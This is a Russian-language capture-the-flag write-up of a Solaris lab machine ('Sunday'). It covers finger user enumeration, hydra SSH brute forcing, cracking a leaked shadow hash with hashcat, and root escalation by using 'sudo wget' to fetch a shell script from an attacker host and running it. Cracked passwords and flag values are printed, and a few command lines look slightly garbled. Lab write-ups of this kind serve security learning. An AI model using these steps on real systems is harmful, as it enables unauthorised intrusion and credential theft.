Обзор сервисов
Проведем разведку с помощью nmapAutomator
машины 10.10.10.76
:
$ nmapAutomator.sh -H 10.10.10.76 -t Script
PORT STATE SERVICE VERSION
79/tcp open finger Sun Solaris fingerd
|_finger: No one logged on\x0D
111/tcp open rpcbind 2-4 (RPC #100000)
22022/tcp open ssh SunSSH 1.3 (protocol 2.0)
| ssh-hostkey:
| 1024 d2:e5:cb:bd:33:c7:01:31:0b:3c:63:d9:82:d9:f1:4e (DSA)
|_ 1024 e4:2c:80:62:cf:15:17:79:ff:72:9d:df:8b:a6:c9:ac (RSA)
42489/tcp open smserverd 1 (RPC #100155)
47716/tcp open unknown
Service Info: OS: Solaris; CPE: cpe:/o:sun:sunos
Сервис Finger
$ finger [email protected]
Login Name TTY Idle When Where
root Super-User pts/3 <Apr 24, 2018> sunday
$ finger [email protected]
Login Name TTY Idle When Where
adm Admin < . . . . >
lp Line Printer Admin < . . . . >
uucp uucp Admin < . . . . >
nuucp uucp Admin < . . . . >
dladm Datalink Admin < . . . . >
listen Network Admin < . . . . >
С помощью finger-user-enum
найдем пользователей (http://pentestmonkey.net/tools/finger-user-enum).
$ perl finger-user-enum.pl -U /usr/share/seclists/Usernames/xato-net-10-million-usernames.txt -t 10.10.10.76
[email protected]: Login Name TTY Idle When Where..adm Admin
< . . . . >..lp Line Printer Admin < . . . . >..uucp uucp Admin
< . . . . >..nuucp uucp Admin < . . . . >..dladm Datalink Admin
< . . . . >..listen Network Admin < . . . . >..
[email protected]: root Super-User pts/3 <Apr 24, 2018> sunday ..
[email protected]: Login Name TTY Idle When Where..svctag Service Tag UID
< . . . . >..
[email protected]: access No Access User < . . . . >..nobody4 SunOS 4.x NFS Anonym
< . . . . >..
[email protected]: sammy console <Jul 31, 2020>..
[email protected]: sunny pts/3 <Apr 24, 2018> 10.10.14.4 ..
[email protected]: bin ??? < . . . . >..
[email protected]: Login Name TTY Idle When Where..listen Network Admin
< . . . . >..
[email protected]: nobody NFS Anonymous Access < . . . . >..
[email protected]: Admin < . . . . >..
[email protected]: Login Name TTY Idle When Where..films+pic+galeries ???..
[email protected]: Login Name TTY Idle When Where..lp Line Printer Admin < . . . . >..
[email protected]: daemon ??? < . . . . >..
[email protected]: Login Name TTY Idle When Where..sammy sammy console <Jul 31, 2020>..
[email protected]: Login Name TTY Idle When Where..lp Line Printer Admin
< . . . . >..
[email protected]: Login Name TTY Idle When Where..nobody NFS Anonymous Access < . . . . >..nobody4 SunOS 4.x NFS Anonym < . . . . >..
[email protected]: Login Name TTY Idle When Where..smmsp SendMail Message Sub < . . . . >..
[email protected]: listen Network Admin < . . . . >..
[email protected]: Login Name TTY Idle When Where..xvm xVM User
< . . . . >..openldap OpenLDAP User < . . . . >..nobody NFS Anonymous Access < . . . . >..noaccess No Access User < . . . . >..nobody4 SunOS 4.x NFS Anonym < . . . . >..
[email protected]: Login Name TTY Idle When Where..smmsp SendMail Message Sub < . . . . >..
[email protected]: sys ??? < . . . . >..
[email protected]: adm Admin < . . . . >..
Выпишем имена пользователей в users.txt
:
sammy
sunny
admin
root
С помощью hydra
попробуем сбрутить пароли для SSH:
$ hydra -L users.txt -P /usr/share/wordlists/rockyou.txt -s 22022 10.10.10.76 ssh
sunny:sunday
Подключимся к учетке по SSH:
ssh [email protected] -oKexAlgorithms=+diffie-hellman-group1-sha1 -p 22022
Находим резервную копию файла /etc/shadows
в /backup/shadow.backup
, попробуем сбрутить:
$ cat /backup/shadow.backup
mysql:NP:::::::
openldap:*LK*:::::::
webservd:*LK*:::::::
postgres:NP:::::::
svctag:*LK*:6445::::::
nobody:*LK*:6445::::::
noaccess:*LK*:6445::::::
nobody4:*LK*:6445::::::
sammy:$5$Ebkn8jlK$i6SSPa0.u7Gd.0oJOT4T421N2OvsfXqAT1vCoYUOigB:6445::::::
sunny:$5$iRMbpnBv$Zh7s6D7ColnogCdiVE5Flz9vCZOMkUFxklRhhaShxv3:17636::::::
$ echo $5$Ebkn8jlK$i6SSPa0.u7Gd.0oJOT4T421N2OvsfXqAT1vCoYUOigB > hash
$ hashcat -m 7400 hash /usr/share/wordlists/rockyou.txt
sammy:cooldude!
Флаг пользователя
$ su -u sammy
6. sammy@sunday:~/Desktop$ ifconfig -a
lo0: flags=2001000849<UP,LOOPBACK,RUNNING,MULTICAST,IPv4,VIRTUAL> mtu 8232 index 1
inet 127.0.0.1 netmask ff000000
pcn0: flags=1000843<UP,BROADCAST,RUNNING,MULTICAST,IPv4> mtu 1500 index 2
inet 10.10.10.76 netmask ffffff00 broadcast 10.10.10.255
lo0: flags=2002000849<UP,LOOPBACK,RUNNING,MULTICAST,IPv6,VIRTUAL> mtu 8252 index 1
inet6 ::1/128
sammy@sunday:~/Desktop$ cat user.txt
a3d9498027ca5187ba1793943ee8a598
Повышение привилегий
Проверим, что мы можем делать как суперпользователь:
$ sudo -l
User sunny may run the following commands on this host:
(root) NOPASSWD: /root/troll
Мы можем переписать файл /root/troll
, напишем свой шелл в файл writeup.sh
, запустим nc
, запустим веб-сервер и выполним как sudo
:
sudo wget -O /root/troll http://10.10.14.6/writeup.sh
# как sunny
sudo /root/troll
Флаг суперпользователя
root@sunday:/root# ifconfig -a
lo0: flags=2001000849<UP,LOOPBACK,RUNNING,MULTICAST,IPv4,VIRTUAL> mtu 8232 index 1
inet 127.0.0.1 netmask ff000000
pcn0: flags=1000843<UP,BROADCAST,RUNNING,MULTICAST,IPv4> mtu 1500 index 2
inet 10.10.10.76 netmask ffffff00 broadcast 10.10.10.255
ether 0:50:56:b9:59:61
lo0: flags=2002000849<UP,LOOPBACK,RUNNING,MULTICAST,IPv6,VIRTUAL> mtu 8252 index 1
inet6 ::1/128
root@sunday:/root# cat root.txt
fb40fab61d99d37536daeec0d97af9b8